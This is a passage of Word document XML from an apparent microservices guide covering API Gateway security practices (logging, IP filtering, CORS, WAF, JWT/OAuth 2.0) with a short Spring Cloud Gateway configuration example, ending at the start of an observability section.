        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F696264"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For additional security, especially when sensitive data is being passed from the API Gateway to microservices, consider implementing </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>end-to-end encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the entire communication path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F04ADA" w14:textId="77777777" w:rsidR="00D056EB"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8BF4966">
          <v:rect id="_x0000_i2826" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="157473B3"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5. Audit and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F876016"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Audit logging helps in tracing security-related incidents and understanding who accessed what data and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777DFF76"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Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE390B"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The API Gateway should log requests, including headers, request bodies, and response codes, for security auditing purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F397C"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These logs should contain relevant information such as </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>status code</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user identity</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to facilitate identifying malicious or unauthorized access attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CFF65"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Audit Trails</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8EAC1E"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An audit trail is critical to track and store security-relevant events and activities for compliance purposes and investigating security incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DE05B" w14:textId="77777777" w:rsidR="00D056EB"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6FBCA7">
          <v:rect id="_x0000_i2827" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844B44A"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6. IP Whitelisting/Blacklisting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC53B52"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Restrict access based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F819AB9"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Whitelisting</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A196E44"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Allow requests only from specific IP addresses or ranges. This can be useful for securing internal APIs that should only be accessed by specific trusted clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA81659"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Blacklisting</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E2088"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Block access from known malicious IP addresses or ranges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E2F733" w14:textId="77777777" w:rsidR="00D056EB"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2A50A0B">
          <v:rect id="_x0000_i2828" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C320152"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7. Cross-Origin Resource Sharing (CORS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35697D8F"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CORS is essential when handling </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cross-origin requests</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (when a client from one origin tries to access resources hosted on a different origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B029777"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Configuring CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7972C5"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The API Gateway should enforce CORS policies to allow or restrict cross-origin requests to services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734AE6E"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For instance, only allow requests from certain trusted origins and reject others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B149B03" w14:textId="77777777" w:rsidR="00D056EB"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07F0463">
          <v:rect id="_x0000_i2829" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="008B8EE5"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8. Web Application Firewall (WAF) Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5A1A4"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Integrate a </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web Application Firewall (WAF)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the API Gateway level to monitor and filter HTTP requests to protect services from common threats such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E46B7C4"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SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A04BF76"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Cross-site scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033209FB"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Distributed Denial of Service (DDoS) attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B59C2E" w14:textId="77777777" w:rsidR="00D056EB"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3D8333E">
          <v:rect id="_x0000_i2830" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F355AD2"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9. API Gateway Security Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9E70E"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JWT Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451E9D7"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The API Gateway can validate </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on behalf of the microservices to authenticate users and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584AA35"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If the token is invalid or expired, the gateway can reject the request early, saving time and resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D828992"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OAuth 2.0 Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E48978" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for authorization and integrate with an </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth 2.0 Authorization Server</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This allows the API Gateway to act as an OAuth resource server to authenticate tokens and authorize access based on scopes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317A9BEF" w14:textId="77777777" w:rsidR="00D056EB"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8328CDF">
          <v:rect id="_x0000_i2831" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BCE369"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Example Configuration (Spring Cloud Gateway with Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346D06D7"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AC3BD3"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public class SecurityConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FDFB3" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03B5ABE6"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90502C"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public SecurityWebFilterChain securityWebFilterChain(ServerHttpSecurity http) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A609BFA"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074C8031"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csrf().disable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDE9E63"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authorizeExchange()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236EF37D"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pathMatchers("/api/public/**").permitAll()  // Open endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727FCCBC"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pathMatchers("/api/secure/**").authenticated()  // Secure endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDE4FB2"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            .and()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA41BD6"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oauth2Login();  // OAuth 2.0 login for authentication via Identity Provider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC8EBF"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return http.build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468D2375"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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9612D3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D01E5"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In this configuration, the API Gateway will allow unauthenticated access to public endpoints and require authentication for secure endpoints using </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OAuth 2.0</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E6E7B" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00000000" w:rsidP="008B3EF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652F517">
          <v:rect id="_x0000_i2832" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8138AD" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34683671"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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for providing centralized security mechanisms, including authentication, authorization, rate limiting, encryption, logging, and more. By securing the API Gateway, you can ensure that only authenticated and authorized clients can access the microservices, reducing the attack surface and improving the overall security of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFD4E9E"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key security concerns to handle in the API Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDB467"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Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using JWT, OAuth2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BEA550"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Rate Limiting</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Throttling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D8DC5C"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TLS/SSL Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A774A"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Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Audit Trails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0EF864" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CORS</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> management and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE4215" w14:textId="449E2BD1" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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13C6291">
          <v:rect id="_x0000_i2833" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B5C1E" w14:textId="7E75FCE7" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00182BF2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="683" w:name="_Toc196308163"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Observability: Logging, tracing, and monitoring best practices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="683"/>
    </w:p>
    <w:p w14:paraId="655B3DB8" w14:textId="5B66FE42" w:rsidR="00D056EB" w:rsidRPr="00FA65E9" w:rsidRDefault="00D056EB" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Observability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
